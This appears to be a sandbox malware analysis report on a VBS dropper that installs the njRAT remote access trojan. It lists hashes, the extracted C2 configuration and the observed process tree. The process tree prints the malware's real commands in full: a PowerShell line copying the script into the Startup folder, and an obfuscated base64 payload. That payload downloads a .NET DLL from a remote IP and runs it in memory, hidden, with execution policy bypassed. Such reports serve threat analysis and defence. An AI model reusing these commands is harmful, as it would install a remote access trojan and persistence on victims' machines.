Analysis
-
max time kernel
148s -
max time network
137s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 09:11
General
-
Target
2471384713084738.vbs
-
Size
484KB
-
MD5
c411c39688a4e3be08e80fcef384b448
-
SHA1
2970efe8b3902cd3edb2d41258b1888e494eef37
-
SHA256
46910a6dfb9487947703a1f69d55e76b0d6bdc560a5ed85e7fd65c48924ea6b6
-
SHA512
8bc088ce4b622e3a0cf7111eaae437cfa2211c6bfca248f6e42a166a6eede54c65fee73cf64652e8c3dd5d2f3764c556677e1bfd195873d491f5d7e7cf3ae0ee
Malware Config
Extracted
http://149.56.200.165/dll/3.txt
Extracted
njrat
0.7NC
NYAN CAT
david123456.duckdns.org:9000
b14f9f9db82b4
-
reg_key
b14f9f9db82b4
-
splitter
@!#&^%$
Signatures
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 1 IoCs
-
Drops startup file 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2471384713084738.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\2471384713084738.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ KHS.vbs')2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\2471384713084738.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ KHS.vbs')3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC➠⇗↪Hk➠⇗↪d➠⇗↪Bl➠⇗↪Fs➠⇗↪XQBd➠⇗↪C➠⇗↪➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪g➠⇗↪D0➠⇗↪I➠⇗↪Bb➠⇗↪FM➠⇗↪eQBz➠⇗↪HQ➠⇗↪ZQBt➠⇗↪C4➠⇗↪QwBv➠⇗↪G4➠⇗↪dgBl➠⇗↪HI➠⇗↪d➠⇗↪Bd➠⇗↪Do➠⇗↪OgBG➠⇗↪HI➠⇗↪bwBt➠⇗↪EI➠⇗↪YQBz➠⇗↪GU➠⇗↪Ng➠⇗↪0➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪K➠⇗↪BO➠⇗↪GU➠⇗↪dw➠⇗↪t➠⇗↪E8➠⇗↪YgBq➠⇗↪GU➠⇗↪YwB0➠⇗↪C➠⇗↪➠⇗↪TgBl➠⇗↪HQ➠⇗↪LgBX➠⇗↪GU➠⇗↪YgBD➠⇗↪Gw➠⇗↪aQBl➠⇗↪G4➠⇗↪d➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪R➠⇗↪Bv➠⇗↪Hc➠⇗↪bgBs➠⇗↪G8➠⇗↪YQBk➠⇗↪FM➠⇗↪d➠⇗↪By➠⇗↪Gk➠⇗↪bgBn➠⇗↪Cg➠⇗↪JwBo➠⇗↪HQ➠⇗↪d➠⇗↪Bw➠⇗↪Do➠⇗↪Lw➠⇗↪v➠⇗↪DE➠⇗↪N➠⇗↪➠⇗↪5➠⇗↪C4➠⇗↪NQ➠⇗↪2➠⇗↪C4➠⇗↪Mg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Lg➠⇗↪x➠⇗↪DY➠⇗↪NQ➠⇗↪v➠⇗↪GQ➠⇗↪b➠⇗↪Bs➠⇗↪C8➠⇗↪Mw➠⇗↪u➠⇗↪HQ➠⇗↪e➠⇗↪B0➠⇗↪Cc➠⇗↪KQ➠⇗↪p➠⇗↪Ds➠⇗↪WwBT➠⇗↪Hk➠⇗↪cwB0➠⇗↪GU➠⇗↪bQ➠⇗↪u➠⇗↪EE➠⇗↪c➠⇗↪Bw➠⇗↪EQ➠⇗↪bwBt➠⇗↪GE➠⇗↪aQBu➠⇗↪F0➠⇗↪Og➠⇗↪6➠⇗↪EM➠⇗↪dQBy➠⇗↪HI➠⇗↪ZQBu➠⇗↪HQ➠⇗↪R➠⇗↪Bv➠⇗↪G0➠⇗↪YQBp➠⇗↪G4➠⇗↪LgBM➠⇗↪G8➠⇗↪YQBk➠⇗↪Cg➠⇗↪J➠⇗↪BE➠⇗↪Ew➠⇗↪T➠⇗↪➠⇗↪p➠⇗↪C4➠⇗↪RwBl➠⇗↪HQ➠⇗↪V➠⇗↪B5➠⇗↪H➠⇗↪➠⇗↪ZQ➠⇗↪o➠⇗↪Cc➠⇗↪QwBs➠⇗↪GE➠⇗↪cwBz➠⇗↪Ew➠⇗↪aQBi➠⇗↪HI➠⇗↪YQBy➠⇗↪Hk➠⇗↪Mw➠⇗↪u➠⇗↪EM➠⇗↪b➠⇗↪Bh➠⇗↪HM➠⇗↪cw➠⇗↪x➠⇗↪Cc➠⇗↪KQ➠⇗↪u➠⇗↪Ec➠⇗↪ZQB0➠⇗↪E0➠⇗↪ZQB0➠⇗↪Gg➠⇗↪bwBk➠⇗↪Cg➠⇗↪JwBS➠⇗↪HU➠⇗↪bg➠⇗↪n➠⇗↪Ck➠⇗↪LgBJ➠⇗↪G4➠⇗↪dgBv➠⇗↪Gs➠⇗↪ZQ➠⇗↪o➠⇗↪CQ➠⇗↪bgB1➠⇗↪Gw➠⇗↪b➠⇗↪➠⇗↪s➠⇗↪C➠⇗↪➠⇗↪WwBv➠⇗↪GI➠⇗↪agBl➠⇗↪GM➠⇗↪d➠⇗↪Bb➠⇗↪F0➠⇗↪XQ➠⇗↪g➠⇗↪Cg➠⇗↪JwB0➠⇗↪Hg➠⇗↪d➠⇗↪➠⇗↪u➠⇗↪Dk➠⇗↪N➠⇗↪➠⇗↪2➠⇗↪DM➠⇗↪Mw➠⇗↪0➠⇗↪DM➠⇗↪NQ➠⇗↪y➠⇗↪DM➠⇗↪Mw➠⇗↪v➠⇗↪HM➠⇗↪bwBt➠⇗↪HM➠⇗↪bwBj➠⇗↪C8➠⇗↪NQ➠⇗↪2➠⇗↪DE➠⇗↪Lg➠⇗↪w➠⇗↪D➠⇗↪➠⇗↪Mg➠⇗↪u➠⇗↪DY➠⇗↪NQ➠⇗↪u➠⇗↪Dk➠⇗↪N➠⇗↪➠⇗↪x➠⇗↪C8➠⇗↪Lw➠⇗↪6➠⇗↪H➠⇗↪➠⇗↪d➠⇗↪B0➠⇗↪Gg➠⇗↪Jw➠⇗↪p➠⇗↪Ck➠⇗↪';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('➠⇗↪','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://149.56.200.165/dll/3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.94633435233/somsoc/561.002.65.941//:ptth'))"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
c6b0a774fa56e0169ed7bb7b25c114dd
SHA1bcdba7d4ecfff2180510850e585b44691ea81ba5
SHA256b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9
SHA51242295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446
-
MD5
03f2cc64967d115eefb6b168e44d1631
SHA1a563bbbe76599dbbbffc9e4320dcc1574ecc8306
SHA25657d74366cdfc4e9a72ec147c740bf149e52d956fec83f531706d1b51c0796ffb
SHA512c66940403fd4ae60d0ca3cfcf615f190b9484099c3e35643255b16e1ea877c3eab14beb2d41ef10e3343e9772de30f157a6b4da46a0b599db62aee488593682c
-
MD5
89fa2800fc7944e2bb7f4239323b527b
SHA1c8fe9383a33538e601a5533b71cd8de86751aa5e
SHA2560c1b1cac51833f60baf401103371fde4ed020f7a84e9cd70eca717191ad23b81
SHA512c1d107328d8c83ecc2824ffde610f7057c2ba4b462bf9572147495f5a227e30492683eab577db244dbd3ed5c9742a78cab4f8fdd26c7e2f4332d0a6f5b93db0f
-
Filesize
5.0MB
-
Filesize
584KB
-
Filesize
5.0MB
-
Filesize
624KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
40KB
-
Filesize
48KB
-
-
Filesize
408KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
56KB
-
Filesize
328KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
472KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-